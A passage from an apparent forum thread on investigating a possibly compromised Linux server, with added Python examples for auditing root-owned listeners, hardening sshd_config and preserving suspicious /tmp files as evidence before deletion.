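def exposed_root_listeners(rows):
    """TCP sockets in LISTEN, bound to every interface, owned by root: the
    services whose compromise hands over the whole box, not one account."""
    return sorted({(r["local"], r["cmd"]) for r in rows
                   if r["state"] == "LISTEN" and r["user"] == "root"
                   and r["local"].startswith("*:")})


def connections(rows):
    """Count live TCP connections.  A connection whose local port is one we
    listen on is inbound (keyed by that service); anything else was opened
    by this host (keyed by the remote service port)."""
    listen_ports = {port_of(r["local"]) for r in rows if r["state"] == "LISTEN"}
    inbound, outbound = Counter(), Counter()
    for r in rows:
        if not r["remote"] or r["state"] not in ("ESTABLISHED", "SYN_SENT"):
            continue
        lport = port_of(r["local"])
        if lport in listen_ports:
            inbound[lport] += 1
        else:
            outbound[port_of(r["remote"])] += 1
    return inbound, outbound


if __name__ == "__main__":
    rows = parse_lsof(SAMPLE_LSOF)
    print("root services reachable from outside:", exposed_root_listeners(rows))
    inbound, outbound = connections(rows)
    print("inbound by service:", dict(inbound))
    print("outbound by remote port:", dict(outbound))
```

On a mail host a burst of outbound `smtp` connections can be legitimate queue draining, so the outbound counter is a prompt to look at the qmail queue, not a verdict. Note also that `lsof` on a possibly rootkitted system reports what the kernel and libc let it see; the same numbers taken from a firewall or the upstream router are the ones to trust.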
I should also point out that all the logs are in /var/log.
Quote from author:
top - 15:56:09 up 1 day, 6:57, 1 user, load average: 0.16, 0.16, 0.17
Tasks: 150 total, 1 running, 149 sleeping, 0 stopped, 0 zombie
Cpu(s): 7.6% us, 2.0% sy, 0.0% ni, 89.4% id, 0.7% wa, 0.3% hi, 0.0% si
Mem: 1027444k total, 806752k used, 220692k free, 156772k buffers
Swap: 385552k total, 280k used, 385272k free, 156656k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1290 popuser 20 0 26744 21m 2640 S 6.6 2.1 0:00.20 /usr/bin/spamd --u
440 root 15 0 0 0 0 S 0.3 0.0 0:12.02 [kjournald]
3263 drweb 16 0 12576 8104 2304 S 0.3 0.8 0:08.69 /opt/drweb/drwebd
1116 root 16 0 3592 948 728 R 0.3 0.1 0:00.16 top -c
1 root 16 0 1708 456 392 S 0.0 0.0 0:00.82 init [3]
2 root 34 19 0 0 0 S 0.0 0.0 0:00.12 [ksoftirqd/0]
3 root 5 -10 0 0 0 S 0.0 0.0 0:09.16 [events/0]
4 root 11 -10 0 0 0 S 0.0 0.0 0:00.00 [khelper]
16 root 15 -10 0 0 0 S 0.0 0.0 0:00.00 [kacpid]
96 root 5 -10 0 0 0 S 0.0 0.0 0:01.59 [kblockd/0]
104 root 15 0 0 0 0 S 0.0 0.0 0:00.00 [khubd]
158 root 20 0 0 0 0 S 0.0 0.0 0:00.00 [pdflush]
159 root 15 0 0 0 0 S 0.0 0.0 0:00.51 [pdflush]
161 root 14 -10 0 0 0 S 0.0 0.0 0:00.00 [aio/0]
160 root 16 0 0 0 0 S 0.0 0.0 0:01.76 [kswapd0]
254 root 25 0 0 0 0 S 0.0 0.0 0:00.00 [kseriod]
1513 root 15 0 0 0 0 S 0.0 0.0 0:00.00 [kjournald]
What should I do with my sshd_config?
Quote from author:
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
ls -al /tmp
ls -al /var/tmp
and give us the result.
Protocol 2
PermitRootLogin no
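A way to check those two directives before and after editing, and to apply them, as an added example that is not from the thread or from OpenSSH. It follows the sshd_config rules that matter here: a directive is `Keyword value` or `Keyword=value`, the first occurrence of a keyword wins, and anything after a `Match` line is conditional, so the parser stops there. The sample configuration is constructed.

```python
import re

# "Keyword value" or "Keyword=value", as sshd_config(5) allows.
KEY_RX = re.compile(r"^([A-Za-z][A-Za-z0-9]*)\s*=?\s*(.*)$")

# The values from the reply above; order matters only for readability.
WANTED = [("Protocol", "2"), ("PermitRootLogin", "no")]


def parse_sshd_config(text):
    """Return {lowercase keyword: value} for the global section.  sshd uses
    the first value it sees for a keyword, so later repeats are ignored, and
    directives inside Match blocks apply only to matching connections."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = KEY_RX.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        conf.setdefault(key, value)
    return conf


def audit_sshd_config(text):
    """Report the two conditions rkhunter warned about.  A directive that is
    absent is reported too: the build default then applies, and on the
    OpenSSH releases of this era that default allowed root login."""
    conf = parse_sshd_config(text)
    findings = []
    root = conf.get("permitrootlogin")
    if root is None or root.lower() != "no":
        findings.append({"key": "PermitRootLogin", "value": root,
                         "why": "root can log in directly over SSH"})
    proto = conf.get("protocol")
    if proto is None or "1" in [p.strip() for p in proto.split(",")]:
        findings.append({"key": "Protocol", "value": proto,
                         "why": "SSH protocol 1 is accepted or not excluded"})
    return findings


def harden(text):
    """Return the configuration with the WANTED directives placed first, so
    they are the first occurrence sshd sees.  Global lines for those keywords
    are dropped; lines inside Match blocks are left alone, since removing
    them would change behaviour for the matched connections."""
    wanted_keys = {k.lower() for k, _ in WANTED}
    kept, in_match = [], False
    for raw in text.splitlines():
        m = KEY_RX.match(raw.split("#", 1)[0].strip())
        if m and m.group(1).lower() == "match":
            in_match = True
        if m and not in_match and m.group(1).lower() in wanted_keys:
            continue
        kept.append(raw)
    header = [f"{k} {v}" for k, v in WANTED]
    return "\n".join(header + kept) + "\n"


# Constructed sample showing the weak settings the scan flagged.
WEAK_CONFIG = """\
# sample sshd_config (constructed)
Protocol 2,1
PermitRootLogin yes
X11Forwarding no
"""

if __name__ == "__main__":
    for f in audit_sshd_config(WEAK_CONFIG):
        print(f"{f['key']} = {f['value']!r}: {f['why']}")
    print(harden(WEAK_CONFIG))
```

After writing the new file, check it with `sshd -t` and restart sshd from a session you keep open, so a typo cannot lock you out. Servers running OpenSSH 7.4 or later no longer implement protocol 1 at all, so the `Protocol` line only matters on old releases like the 3.6.1p2 in this thread.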
tmp]# ls -al
total 1264
drwxrwxrwt 6 root root 12288 Jun 8 12:58 .
drwxr-xr-x 21 root root 4096 Jun 8 08:23 ..
-rw-r--r-- 1 root root 312 Jun 8 09:51 autoinstaller.log
drwx------ 2 apache apache 4096 Feb 11 2002 belea
-rw------- 1 apache apache 350063 Dec 24 17:25 flood.tar.gz
drwxrwxrwt 2 xfs xfs 4096 Jun 8 08:24 .font-unix
-rw------- 1 apache apache 1519 Jun 2 03:28 gg
-rw------- 1 apache apache 1701 Jun 1 11:11 google.txt
drwxrwxrwt 2 root root 4096 Jun 8 08:23 .ICE-unix
-rw------- 1 root root 0 Jun 8 09:51 psa-installer.lock
drwxr-xr-x 3 root root 4096 Jun 2 15:40 rkhunter
-rw-r--r-- 1 root root 170732 May 24 2005 rkhunter-1.2.7.tar.gz
-rw------- 1 apache apache 2859 Jun 1 11:11 sc.txt
-rw------- 1 apache apache 700086 Jun 2 10:13 sites.txt
srw-rw-rw- 1 popuser root 0 Jun 8 08:24 spamd_full.sock
srw-rw-rw- 1 popuser root 0 Jun 8 08:24 spamd_light.sock
srwxrwxrwx 1 postgres postgres 0 Jun 8 13:09 .s.PGSQL.5432
-rw------- 1 postgres postgres 25 Jun 8 13:09 .s.PGSQL.5432.lock
-rw------- 1 apache apache 2308 Jun 2 04:29 wlist.txt
Apart from the rkhunter files, which I installed, I don't recognize the others. Should I delete them all?
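A listing like the one above is easier to reason about when the entries are sorted by who owns them: files that the web server account wrote into /tmp are the ones an attacker who came in through the web application would have left. The block below is an added example (not code from the thread) that parses `ls -al` output, flags entries owned by the web server account, executables and archives, and produces the copy-and-hash commands to run before anything is deleted, so there is still something to analyse afterwards. The listing is constructed to resemble the one posted; the web server account name `apache`, the evidence directory `/root/evidence` and the `known` allow-list are assumptions.

```python
import re
import shlex

# Constructed `ls -al` listing modelled on the one posted above, with the
# columns aligned; the web server account is assumed to be "apache".
SAMPLE_LS = """\
total 1264
drwxrwxrwt  6 root     root      12288 Jun  8 12:58 .
drwxr-xr-x 21 root     root       4096 Jun  8 08:23 ..
-rw-r--r--  1 root     root        312 Jun  8 09:51 autoinstaller.log
drwx------  2 apache   apache     4096 Feb 11  2002 belea
-rw-------  1 apache   apache   350063 Dec 24 17:25 flood.tar.gz
drwxrwxrwt  2 xfs      xfs        4096 Jun  8 08:24 .font-unix
-rw-------  1 apache   apache     1519 Jun  2 03:28 gg
-rw-------  1 apache   apache     1701 Jun  1 11:11 google.txt
drwxr-xr-x  3 root     root       4096 Jun  2 15:40 rkhunter
-rw-r--r--  1 root     root     170732 May 24  2005 rkhunter-1.2.7.tar.gz
srw-rw-rw-  1 popuser  root          0 Jun  8 08:24 spamd_full.sock
srwxrwxrwx  1 postgres postgres      0 Jun  8 13:09 .s.PGSQL.5432
-rw-------  1 apache   apache     2308 Jun  2 04:29 wlist.txt
"""

# mode, link count, owner, group, size, "Mon dd HH:MM" or "Mon dd  yyyy", name
LS_RX = re.compile(
    r"^(?P<mode>[-dlspbc][rwxsStT-]{9}[.+]?)\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+(?P<size>\d+)\s+(?P<mtime>\w{3}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+(?P<name>.+)$")


def parse_ls(text):
    """Return one dict per entry, skipping '.' and '..' and the 'total' line."""
    entries = []
    for line in text.splitlines():
        m = LS_RX.match(line)
        if m and m.group("name") not in (".", ".."):
            entries.append(m.groupdict())
    return entries


def suspicious_entries(entries, web_user, known=()):
    """Flag what an attacker who came in through the web application would
    leave behind: anything owned by the web server account, plus executables
    and archives owned by anyone, unless the name is in `known`."""
    out = []
    for e in entries:
        if e["name"] in known:
            continue
        reasons = []
        if e["owner"] == web_user:
            reasons.append("owned by the web server account")
        if e["mode"][0] == "-" and "x" in e["mode"][1:]:
            reasons.append("executable regular file")
        if e["name"].endswith((".tar.gz", ".tgz", ".tar", ".zip")):
            reasons.append("archive")
        if reasons:
            out.append({"name": e["name"], "owner": e["owner"],
                        "mtime": e["mtime"], "why": reasons})
    return out


def preserve_commands(findings, src="/tmp", dst="/root/evidence"):
    """Shell commands that copy each flagged entry with ownership and
    timestamps intact (cp -a) and record hashes of every file inside it.
    They are returned as strings for review, not executed."""
    qdst = shlex.quote(dst)
    cmds = [f"mkdir -p {qdst}"]
    for f in findings:
        path = shlex.quote(f"{src}/{f['name']}")
        cmds.append(f"cp -a {path} {qdst}/")
        cmds.append(f"find {path} -type f -exec sha256sum {{}} + >> {qdst}/SHA256SUMS")
    return cmds


if __name__ == "__main__":
    hits = suspicious_entries(parse_ls(SAMPLE_LS), "apache",
                              known=("rkhunter", "rkhunter-1.2.7.tar.gz"))
    for h in hits:
        print(f"{h['name']:<24} {h['owner']:<8} {h['mtime']:<13} {', '.join(h['why'])}")
    print("\n".join(preserve_commands(hits)))
```

The `known` list is where entries you can vouch for go, such as the rkhunter tarball and directory mentioned above; sockets and lock files owned by service accounts are not flagged by these rules and do not need listing. The copy is made with `cp -a` so that the owner, mode and mtime survive; the mtimes are the timeline, and they are lost the moment the file is deleted or re-saved.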